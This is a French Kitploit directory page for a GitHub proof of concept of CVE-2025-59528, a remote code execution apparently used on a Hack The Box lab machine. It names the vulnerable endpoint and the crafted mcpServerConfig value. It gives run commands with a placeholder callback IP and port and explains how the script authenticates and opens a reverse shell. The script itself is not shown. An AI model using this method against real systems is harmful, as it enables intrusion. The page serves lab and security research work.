Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-59528-PoC — PoC pour CVE-2025-59528 utilisé pour réaliser une exécution de code à distance sur la machine Silentium de HTB | Kitploit
Outils/GitHubGitHub/loaxert/cve-2025-59528-poc
ExploitationExploitation d'Applications WebTests de Sécurité des APITests d'IntrusionApprentissage et ÉducationDéveloppement de Charges Utiles
GitHubloaxert/cve-2025-59528-poc

CVE-2025-59528-PoC

PoC pour CVE-2025-59528 utilisé pour réaliser une exécution de code à distance sur la machine Silentium de HTB

Voir le dépôt
30il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-59528 PoC éducatif

Usage éducatif uniquement. Ce projet est destiné à la recherche en sécurité contrôlée, aux démonstrations en classe et aux tests autorisés dans un laboratoire isolé. Ne l'utilisez pas contre des systèmes, réseaux, applications ou comptes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de test.

Ce que ce PoC démontre

Cette preuve de concept démontre comment une valeur mcpServerConfig mal gérée peut permettre l'évaluation JavaScript côté serveur et l'exécution de commandes via la fonctionnalité de chargement de nœuds customMCP.

Le script prend en charge deux méthodes d'authentification :

  • E-mail/mot de passe : s'authentifie via le point de terminaison de connexion de l'application et réutilise les cookies de session renvoyés.
  • Jeton Bearer : envoie une clé API dans l'en-tête Authorization.

Après l'authentification, le script soumet une configuration spécialement conçue à /api/v1/node-load-method/customMCP. La charge utile utilise la fonctionnalité de processus enfants de Node.js pour exécuter une commande shell et établir une connexion de retour vers un écouteur contrôlé par le chercheur. Ce comportement est inclus uniquement pour démontrer l'impact potentiel dans un environnement de laboratoire autorisé.

Prérequis

  • Python 3.
  • Le paquet requests.

Installez la dépendance avec :

python3 -m pip install requests

Utilisation

Enregistrez le script sous le nom CVE-2025-59528.py.

Mode e-mail et mot de passe

python3 CVE-2025-59528.py <email> <password> <target-host> <callback-ip> <callback-port>

Exemple avec des valeurs à titre de documentation uniquement :

python3 CVE-2025-59528.py [email protected] 'REDACTED_PASSWORD' lab.example.test 192.0.2.10 4444

Mode jeton Bearer

python3 CVE-2025-59528.py <api-key> <target-host> <callback-ip> <callback-port>

Exemple avec des valeurs à titre de documentation uniquement :

python3 CVE-2025-59528.py 'REDACTED_API_KEY' lab.example.test 192.0.2.10 4444

Le script s'attend à ce que ces routes d'application soient disponibles :

  • /api/v1/auth/login
  • /api/v1/node-load-method/customMCP

Le script actuel construit des URL http://. Mettez à jour l'implémentation pour HTTPS lorsque vous testez un déploiement de laboratoire nécessitant TLS.

Comment le code fonctionne

  1. main() valide le nombre d'arguments de la ligne de commande et sélectionne le mode d'authentification.
  2. login() envoie les identifiants fournis au point de terminaison de connexion.
  3. tokens() extrait les valeurs de session de l'en-tête de réponse Set-Cookie.
  4. shell() construit la requête authentifiée et soumet la valeur mcpServerConfig spécialement conçue.
  5. bearer() effectue la même requête en utilisant un jeton Bearer au lieu de cookies de session.
  6. Le corps de la réponse est affiché afin que le chercheur puisse corréler le résultat avec les journaux de l'application et du serveur.
Télécharger l’outil